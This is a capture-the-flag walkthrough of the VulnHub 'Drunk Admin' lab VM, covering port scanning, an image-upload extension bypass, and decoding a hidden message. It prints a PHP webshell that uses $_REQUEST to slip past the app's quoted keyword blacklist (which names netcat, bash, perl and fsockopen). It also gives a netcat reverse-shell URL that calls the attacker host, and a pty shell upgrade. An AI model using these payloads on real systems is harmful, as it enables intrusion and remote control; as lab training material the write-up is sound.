VulnHub Drunk Admin Web Hacking Challenge: 1
Download: http://bechtsoudis.com/data/challenges/drunk_admin_hacking_challenge.zip
Download: https://download.vulnhub.com/drunkadminhackingchallenge/drunk_admin_hacking_challenge.zip
Download (torrent): https://download.vulnhub.com/drunkadminhackingchallenge/drunk_admin_hacking_challenge.zip.torrent
Preface
Release date: Apr 2012
Target IP: 10.101.27.241
Attacker IP (Kali): 10.101.27.128
Port scan
nmap -sV 10.101.27.241 -p1-65535
Port 22 is open with SSH, and port 8880 serves HTTP.
Browsing to the service on port 8880 shows an image upload web application.
Directory scan of the site
Trying to access the discovered paths:
Webshell upload
The image upload is the way in. Uploading a file whose extension is not an image format shows: Invalid file extension!
After renaming the extension to .php.jpg the upload succeeds. The image URL is http://10.101.27.241:8880/images/b864b86cfa7d0935f61dac5eac9e91e8.jpg, so the file name is rewritten before the file is stored. The 32 hex characters look like MD5, which hash-identifier confirms.
So the stored name follows the rule: MD5 of the original file name, plus the file's extension.
Uploading a file named .jpg.php also works. Write into the file:
<?php echo "success";?>
Compute the MD5 of pic.jpg.php and request that path: the PHP code is executed.
Next, try uploading a one-line webshell:
<?php echo exec($_GET["cmd"]); ?>
After the upload the page shows: Ohhh you are naughty! So the content is filtered and the upload is blocked.
Use file_get_contents to read the source of upload.php:
<?php echo file_get_contents("../upload.php");?>
Tidied up, the relevant part looks like this (the listing is fragmentary: the conditions of the surrounding if statements are missing):
<?php
(MAX_SIZE*1024) {
    echo 'You have exceeded the size limit!';
    $errors=1;
}
// stored name: md5(original file name) + '.' + extension
$raw_name=md5($image);
$image_name=md5($image).'.'.$extension;
$newname="images/".$image_name;
$copied = copy($_FILES['image']['tmp_name'], $newname);
if (!$copied) {
    echo 'Copy unsuccessful!';
    $errors=1;
}
else {
    echo 'Invalid file extension!';
    $errors=1;
}
else {
    echo 'No image selected. Be carefull next time!';
    $errors=1;
}
else {
    echo 'No data? Come on give me something to play with!';
    $errors=1;
}
// content blacklist, applied only after the file has already been copied into images/
if(isset($_POST['Submit']) && !$errors) {
    $file = file_get_contents("./images/$image_name");
    if( strpos($file,"perl") ||
        strpos($file,"bash") ||
        strpos($file,"sh -c") ||
        strpos($file,"python") ||
        strpos($file,"nc ") ||
        strpos($file,"netcat") ||
        strpos($file,"base64") ||
        strpos($file,"ruby") ||
        strpos($file,"fsockopen") ||
        strpos($file,"xterm") ||
        strpos($file,"gcc") ||
        strpos($file,'$_GET') ||
        strpos($file,'$_POST') ||
        strpos($file,'$_SERVER') ||
        strpos($file,'$_FILES') ||
        strpos($file,'$_COOKIE') ) {
        echo "Ohhh you are naughty!";
        exec("rm ./images/$image_name");
        die;
    }
    setcookie("trypios", "$raw_name", time()+3600);
    echo '';
}
?>
Command execution
The filter covers the string $_GET, which is why the first one-liner produced "Ohhh you are naughty!". $_REQUEST is not on the list, so build the webshell as follows:
// filename: pic.jpg.php
// URL: http://10.101.27.241:8880/images/5fc28369a5fe906d8d884a82e1dafb8b.php?cmd=id
<?php echo exec($_REQUEST['cmd']) ?>
Reverse shell
Listen on port 446 on Kali:
nc -nvlp 446
Then request the URL to run the command:
http://10.101.27.241:8880/images/5fc28369a5fe906d8d884a82e1dafb8b.php?cmd=nc%2010.101.27.128%20446%20-e%20/bin/bash
This gives a shell; use Python's pty module to get a proper interactive shell:
python -c 'import pty;pty.spawn("/bin/bash")'
Mission
FINAL GOAL: Reveal the hidden message for a date arrange that Bob sent to Alice.
The final goal in the machine description is to find the hidden message, so first look at what is in the www folder.
There is a hidden file .proof, which contains an encrypted string: TGglMUxecjJDSDclN1Ej
It looks like base64; decoding it gives Lh%1L^r2CH7%7Q#, which does not mean anything by itself.
Search for files whose name contains "encrypt":
find / -name "*encrypt*" 2>&1 | sed '/Permission denied/d;'
This finds /home/bob/public_html/encrypt.php. That looks promising, so go to the directory the file is in.
The file lives in public_html, so it is reachable directly through the browser (the ~bob user directory). Visit: http://10.101.27.241:8880/~bob/index.php
It is a decryption app. Feeding it the base64-decoded string yields a latitude/longitude pair; looking it up on Google Maps gives: Akti Tompazi, Chania 731 32, Greece
Reference: http://www.cyberry.co.uk/vulnhub/drunk-admin-web-hacking-challenge-1/